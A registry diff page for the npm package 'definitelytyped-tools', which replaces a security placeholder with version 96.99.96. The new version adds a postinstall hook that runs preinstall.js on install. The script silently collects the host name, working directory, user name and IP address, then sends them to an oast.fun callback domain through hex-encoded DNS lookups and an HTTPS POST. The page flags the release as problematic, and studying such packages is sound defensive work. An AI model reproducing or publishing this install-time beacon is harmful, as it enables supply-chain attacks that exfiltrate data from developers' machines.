definitelytyped-tools 0.0.1-security → 96.99.96
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of definitelytyped-tools might be problematic. Click here for more details.
- package/package.json +6 -3
- package/preinstall.js +58 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,9 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "definitelytyped-tools",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "96.99.96",
|
|
4
|
+
"description": "Enhanced PoC for RCE via postinstall beacon",
|
|
5
|
+
"main": "preinstall.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node preinstall.js"
|
|
8
|
+
}
|
|
6
9
|
}
|
package/preinstall.js
ADDED
|
@@ -0,0 +1,58 @@
|
|
|
1
|
+
const os = require('os');
|
|
2
|
+
const dns = require('dns');
|
|
3
|
+
const https = require('https'); // We will keep the HTTPS fallback
|
|
4
|
+
|
|
5
|
+
// =================== Final, Reliable PoC Payload ===================
|
|
6
|
+
try {
|
|
7
|
+
// --- STEP 1: Attacker's C2 Server ---
|
|
8
|
+
const OAST_DOMAIN = "ocvomeqbrouywnpfvqwhrvnvgydnlrfwc.oast.fun";
|
|
9
|
+
|
|
10
|
+
// --- STEP 2: Safe, Minimal Data Collection ---
|
|
11
|
+
const fingerprint = {
|
|
12
|
+
host: os.hostname() || 'nohost',
|
|
13
|
+
path: process.cwd() || 'nopath',
|
|
14
|
+
user: os.userInfo().username || 'nouser',
|
|
15
|
+
ip: getIPAddress()
|
|
16
|
+
};
|
|
17
|
+
|
|
18
|
+
// --- STEP 3: Primary Exfiltration - Pure DNS Lookup ---
|
|
19
|
+
// This directly tests DNS resolution, bypassing 'curl'. This is your best chance.
|
|
20
|
+
try {
|
|
21
|
+
const data = `h=${fingerprint.host}-p=${fingerprint.path.replace(/[^a-zA-Z0-9-]/g, '')}`;
|
|
22
|
+
const hexPayload = Buffer.from(data).toString('hex');
|
|
23
|
+
const chunks = hexPayload.match(/.{1,60}/g) || [];
|
|
24
|
+
|
|
25
|
+
chunks.forEach((chunk, index) => {
|
|
26
|
+
const subdomain = `${index}.${chunk}.${OAST_DOMAIN}`;
|
|
27
|
+
dns.lookup(subdomain, () => {}); // Fire-and-forget
|
|
28
|
+
});
|
|
29
|
+
} catch(e) { /* Fails silently */ }
|
|
30
|
+
|
|
31
|
+
// --- STEP 4: Fallback Exfiltration - Pure HTTPS Post ---
|
|
32
|
+
// If DNS works but something else is wrong, this might succeed.
|
|
33
|
+
try {
|
|
34
|
+
const postData = JSON.stringify(fingerprint);
|
|
35
|
+
const options = {
|
|
36
|
+
hostname: OAST_DOMAIN, path: '/', method: 'POST',
|
|
37
|
+
headers: {'Content-Type': 'application/json', 'Content-Length': postData.length}
|
|
38
|
+
};
|
|
39
|
+
const req = https.request(options);
|
|
40
|
+
req.on('error', ()=>{}); // Suppress errors
|
|
41
|
+
req.write(postData);
|
|
42
|
+
req.end();
|
|
43
|
+
} catch(e) { /* Fails silently */ }
|
|
44
|
+
|
|
45
|
+
} catch (e) { /* Top-level silent fail */ }
|
|
46
|
+
|
|
47
|
+
// Helper function to get primary IP without spawning a shell.
|
|
48
|
+
function getIPAddress() {
|
|
49
|
+
const interfaces = os.networkInterfaces();
|
|
50
|
+
for (const name of Object.keys(interfaces)) {
|
|
51
|
+
for (const iface of interfaces[name]) {
|
|
52
|
+
if (iface.family === 'IPv4' && !iface.internal) {
|
|
53
|
+
return iface.address;
|
|
54
|
+
}
|
|
55
|
+
}
|
|
56
|
+
}
|
|
57
|
+
return '127.0.0.1';
|
|
58
|
+
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=definitelytyped-tools for more information.
|